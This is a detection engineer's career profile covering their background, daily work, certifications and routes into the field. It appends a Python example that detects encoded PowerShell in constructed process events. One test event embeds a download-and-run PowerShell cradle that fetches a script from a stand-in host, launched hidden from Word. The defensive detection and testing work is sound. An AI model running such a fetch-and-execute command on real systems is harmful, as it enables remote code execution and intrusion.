Introduction
I lead the Detection Engineering team in the UK at NCC Group. My team works on detection logic across various security platforms to identify potential cyber threats across multiple customers’ environments.
Background
But how did I become a detection engineer?
I think the best way to put it is that I “fell” into it.
I was studying Computer Science and Mathematics at the University of Manchester, which included a year of industrial experience as part of the degree. Like most computer science students, I applied for a lot of software engineering placements, and eventually got offered one at BAE Systems Applied Intelligence. Shortly before I was supposed to start, I was contacted by a senior manager there asking if I wanted to try working with their team of “Cyber Security Data Scientists”, because they thought I would be a good fit due to my background in computer science and mathematics. I said, “why not?”, and I’ve been working in threat detection ever since.
A Day in the Life of a Detection Engineer
A typical day in the life of a detection engineer at NCC entails researching, writing and testing new detections for the various security platforms we work with, including – but not limited to – Splunk, Sentinel and Defender for Endpoint.
We also work closely with the SOC analyst team to improve existing detection logic so that we can keep the alert volumes manageable for the SOC.
More senior detection engineers will typically get a bit more involved in activities such as identifying and prioritising detection opportunities, and advising customer-facing teams during active breaches, the onboarding process or purple teams.
My Career at NCC Group
I joined NCC Group 4 years ago, following a detection engineering role at Deloitte. I heard about the role through a university friend who had moved into NCC’s detection engineering team after working internally as a pen tester.
During my time at NCC Group, I have worked my way from being a Detection Engineer to a Senior Detection Engineer to leading the team.
Personal and Professional Growth
With cyber security and the threat landscape ever changing, I have found that not a day goes by at work where I don’t learn something new. Throughout my time here, I have had to work with new technologies and detection platforms, and research numerous tools, techniques and procedures. It’s definitely a great role for those who like to be adaptable and are eager to learn!
Certifications
During my time at NCC Group, I have found that there is a definite commitment to upskilling employees and supporting them in getting certifications. While there is not blanket approval for all certifications, if you pursue a certification that is relevant to your role, you are likely to be supported in your efforts.
Prior to working here, I had no experience at all with some of the security platforms we work with, such as Splunk, Sentinel and Defender for Endpoint. I was given the opportunity to take some Splunk courses and achieve the Splunk Core Certified Power User certification during my first 6 months here. I have also had opportunities to pursue AZ or SC certifications for the Microsoft stack – however, I have yet to take advantage of this, mainly because I really don’t like exams.
Getting into Detection Engineering
There are many routes into Detection Engineering: previous experience in another security role, such as SOC analyst or threat hunter, or a background in data science.
To be a detection engineer, it is important to understand attack techniques and which logging and tooling (SIEM, EDR or NDR) can be used to detect them. You can build this foundational understanding through various courses and certifications, or by building your own home lab so that you can simulate the attacks yourself and then write and test the detection logic that catches them.
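As an added illustration of the "write it, test it, tune it" loop described in the day-in-the-life section and recommended for a home lab above (this is example code written for this page, not NCC Group's or the author's detection content), the block below implements one well-known detection, PowerShell launched with an encoded command line, as plain Python over constructed Sysmon-style process-creation events. It decodes the Base64 payload (PowerShell encodes it as UTF-16LE) so the alert carries the actual command, and it includes an allowlisted parent process to show how a noisy but legitimate source is tuned out to keep SOC alert volume manageable. The host names, user names, `ExampleCorp` agent path, sample command lines and the set of `-EncodedCommand` abbreviations matched are all assumptions made for the example.

```python
"""Encoded-PowerShell detection with a built-in test set of constructed events."""
import base64
import binascii
import re
from dataclasses import dataclass

# powershell.exe accepts -EncodedCommand and unambiguous prefixes such as -e, -ec, -enc.
# The abbreviations listed here are an assumption for this example, not an exhaustive set.
ENC_FLAG = re.compile(r"(?i)(?<!\S)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")

POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe", "\\powershell_ise.exe")

# Tuning: parent processes known (in this hypothetical estate) to launch encoded
# PowerShell legitimately. Compared case-insensitively against the full path.
ALLOWED_PARENTS = {r"c:\program files\examplecorp\agent\agent.exe"}


@dataclass
class Alert:
    rule: str
    host: str
    user: str
    decoded: str      # decoded command, or "" if the blob was not valid UTF-16LE Base64
    evidence: str     # the raw command line that fired the rule


def decode_payload(blob):
    """Decode a -EncodedCommand blob; return None if it is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def detect_encoded_powershell(event):
    """Return an Alert for one process-creation event, or None if it does not match."""
    image = event.get("Image", "").lower()
    if not image.endswith(POWERSHELL_IMAGES):
        return None                       # only PowerShell hosts, so cmd.exe noise never fires
    match = ENC_FLAG.search(event.get("CommandLine", ""))
    if not match:
        return None
    if event.get("ParentImage", "").lower() in ALLOWED_PARENTS:
        return None                       # tuned out: expected behaviour for this parent
    decoded = decode_payload(match.group(1))
    return Alert(
        rule="PowerShell encoded command (T1059.001)",
        host=event.get("Host", "?"),
        user=event.get("User", "?"),
        decoded=decoded or "",
        evidence=event.get("CommandLine", ""),
    )


def run_detection(events):
    """Run the rule across a batch of events and return the alerts it raises."""
    return [a for a in (detect_encoded_powershell(e) for e in events) if a is not None]


def _enc(cmd):
    """Encode a command the way PowerShell expects for -EncodedCommand (UTF-16LE, Base64)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry): one true positive, one benign script,
# one allowlisted parent, and one non-PowerShell process with an "-enc"-looking token.
MALICIOUS_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/stage.ps1')"
SAMPLE_EVENTS = [
    {"Host": "ws01", "User": r"CORP\alice",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_enc(MALICIOUS_CMD)}"},
    {"Host": "ws02", "User": r"CORP\bob",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"Host": "srv01", "User": r"NT AUTHORITY\SYSTEM",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Program Files\ExampleCorp\Agent\agent.exe",
     "CommandLine": f"pwsh.exe -e {_enc('Get-Service | Out-Null')}"},
    {"Host": "ws03", "User": r"CORP\carol",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c echo -enc AAAAAAAAAAAAAAAAAAAAAAAAAAAA"},
]

if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS):
        print(f"[{alert.rule}] {alert.host} {alert.user}: {alert.decoded}")
```

Only the first event produces an alert: the benign script has no encoded flag, the agent-launched command is suppressed by the parent allowlist, and the cmd.exe event never reaches the regex because the image check runs first. Keeping the sample set next to the rule is the point: every time the logic or the allowlist changes, the same four events confirm the true positive still fires and the three quiet cases stay quiet.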